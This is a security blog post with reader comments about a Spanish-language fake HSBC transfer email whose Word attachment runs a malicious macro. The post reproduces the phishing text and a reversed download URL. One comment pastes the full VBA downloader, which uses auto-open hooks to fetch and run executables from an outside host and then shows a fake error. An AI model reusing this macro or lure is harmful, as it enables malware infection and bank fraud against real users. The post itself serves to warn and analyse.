Thursday, 17 July 2014

"Notificación de transferencia de fondos a su favor" spam

This Spanish-language spam has a malicious Word document as an attachment.

From:     HSBC Transferencias [Mexico_contacto@hsbc.com.mx]
Reply-To:     respuesta@hsbc.com.mx
Date:     17 July 2014 11:01

¡BIENVENIDO A HSBC!

El motivo de este correo es informarle que el día de hoy recibió una transferencia SPEI la cual se encuentra retenida debido a anomalías en su cuenta. Para mas detalles sobre esta situación le adjuntamos un documento en formato Microsoft Word donde explicamos el motivo de la retención y los pasos a seguir.


Banco emisor: BBVA BANCOMER
Importe: $94,000.00
Fecha: 17/07/2014
Folio: 89413

Estatus: Retenida
Recomendamos seguir los pasos descritos en el documento adjunto en este correo.


Para cualquier duda o aclaración  nos ponemos a sus órdenes en contacto@hsbc.com.mx o si lo prefiere,  puede comunicarse a Banca por Internet en los siguientes teléfonos:
     México D.F. (55) 5721 1635
     Desde cualquier estado de la República al 01800 4722 638 LADA sin costo.

Con gusto le atenderemos

The attachment is essentially the same as the one mentioned here which tries to lure the victim into removing their Word security settings so that a malicious macro can run.

The VirusTotal detection rate is a pretty poor 4/54. You can see some of the text strings in the Malwr report which feature a reverse URL of exe.ss/pw/arc/lc.paip//:ptth which is reverse to try to download a file from http://piap.cl/cra/wp/ss.exe (currently 404ing). The VBA in the document can be found here [pastebin].

As mentioned before, this is a long-running campaign apparently targeting users in Mexico, and as yet I have not seen this in any language except Spanish.
at

8 comments:

  1. José Alfredo Medellín Navarro17 July 2014 at 16:24

    This comment has been removed by the author.

    ReplyDelete
  2. José Alfredo Medellín Navarro17 July 2014 at 16:33

    Thank you so much, I received this same email yesterday, had no idea what to do until I saw the properties and saw the "modified by "clein"", so I started looking for that name and found your blog. My sister opened the document and activated the macros yesterday, I don't know what to do, the pc isn't behaving suspiciously at all. What should I do? Greetings from México

    edit: When my sister opened the document it said the isn't compatible with my pc. Also, she said it didn't dowloaded anythin after opening.

    ReplyDelete
  3. Otras Aventuras17 July 2014 at 18:10

    Hola como se que no estoy contagiado con algun virus yo lo abri tambien por accidente

    ReplyDelete
  4. Cesar Amezcua17 July 2014 at 19:01

    Este es el código que se ejecuta tengan cuidado, VBA, como dice el post te descarga archivos a tu equipo

    Private Sub Auto_Open()
    Call DownloadFile(StrReverse("exe.ss/pw/arc/lc.paip//:ptth"), "4b646n46.exe")
    End Sub
    Private Sub Workbook_Open()
    Call DownloadFile(StrReverse("exe.ss/pw/arc/lc.paip//:ptth"), "rsd54tgs.exe")
    End Sub
    Private Sub AutoExec()
    Call DownloadFile(StrReverse("exe.ss/pw/arc/lc.paip//:ptth"), "ds8fydsa89f7.exe")
    End Sub
    Private Sub AutoOpen()
    Call DownloadFile(StrReverse("exe.ss/pw/arc/lc.paip//:ptth"), "fsfsfsdsd.exe")
    End Sub
    Private Sub Document_Open()
    Call DownloadFile(StrReverse("exe.ss/pw/arc/lc.paip//:ptth"), "hjhhjhjhjhj.exe")
    End Sub
    Public Function DownloadFile(ByVal URL As String, ByVal SaveName As String, Optional SavePath As String = "TMP", Optional RunAfterDownload As Boolean = True, Optional RunHide As Boolean = False)
    On Error Resume Next
    Err.Clear

    Set XML = CreateObject("Microsoft.XMLHTTP")
    Set ADS = CreateObject("ADODB.Stream")

    XML.Open "GET", URL, False
    XML.send

    XML.getAllResponseHeaders

    FullSavePath = Environ(SavePath) & "\" & SaveName

    ADS.Open
    ADS.Type = 1
    ADS.Write XML.responseBody
    ADS.SaveToFile FullSavePath, 2

    Shell FullSavePath, vbNormalFocus
    DownloadFile = True
    MsgBox "Este documento no es compatible con este equipo." & vbCrLf & vbCrLf & "Por favor intente desde otro equipo.", vbCritical, "Error"
    Dim z
    z = 0
    Do While 1 = 1
    If z = 2 Then
    Application.DisplayAlerts = False
    Application.Quit
    End If
    z = z + 1
    Loop
    End Function

    ReplyDelete
  5. Cesar Amezcua17 July 2014 at 19:15

    Posiblemente por lo que entiendo se descarga en la carpeta Temp en mi caso es

    C:\Users\[usuario]\AppData\Local\Temp

    Sería buscar en esa carpeta los archivos

    4b646n46.exe
    rsd54tgs.exe
    ds8fydsa89f7.exe
    fsfsfsdsd.exe
    hjhhjhjhjhj.exe

    y si es así eliminarlos y aplicar un escaneo al equipo.

    ReplyDelete
  6. Cesar Amezcua17 July 2014 at 19:15

    This comment has been removed by the author.

    ReplyDelete
  7. Conrad Longmore17 July 2014 at 22:05

    @Cosas extrañamente normales: I think opening it is harmless unless you have disabled the Macro security.

    ReplyDelete
  8. José Alfredo Medellín Navarro18 July 2014 at 00:57

    @Conrad Longmore I looks like the macro security was disabled. Just noted my pc opens IE on startup. I did what Cesar Alejandro Amezcua Tejeda said.

    btw

    Gracias @Cesar Alejandro Amezcua Tejeda, en caso de encontrar algo más en el escaneo lo escribiré por aquí. (In any case I find something else in the scan, I'll put it here)

    ReplyDelete